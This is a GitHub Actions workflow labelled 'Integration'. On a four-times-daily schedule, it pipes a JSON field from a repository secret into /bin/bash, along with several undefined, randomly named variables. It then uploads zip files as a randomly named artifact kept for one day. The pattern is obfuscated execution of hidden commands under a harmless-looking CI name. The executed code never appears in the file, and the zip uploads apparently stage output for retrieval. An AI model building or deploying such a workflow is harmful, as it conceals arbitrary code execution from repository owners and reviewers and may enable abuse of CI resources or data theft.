name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '51 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Invoke
        env:
          lso39: ${{ secrets.lso39 }}
        run: |
          printf '%s' "$lso39" | jq -r .inkbt4586 | /bin/bash
          echo $j640 | jq -r .jprh881 | /bin/bash
          echo $owwq5694 | jq -r .dne129 | /bin/bash
          printf '%s' "$kxmb5" | jq -r .r415 | /bin/bash
          printf '%s' "$xmavs4" | jq -r .qoex20935 | /bin/bash
          echo $k9412 | jq -r .ykyut0 | /bin/bash
          echo $ud381 | jq -r .vxjmo2 | /bin/bash
          printf '%s' "$gv76" | jq -r .uyujp76 | /bin/bash
          printf '%s' "$yh7255" | jq -r .qyen93 | /bin/bash

      - name: Store artifact
        uses: actions/upload-artifact@v4
        with:
          name: olPbwjYx
          path: "*.zip"
          retention-days: 1
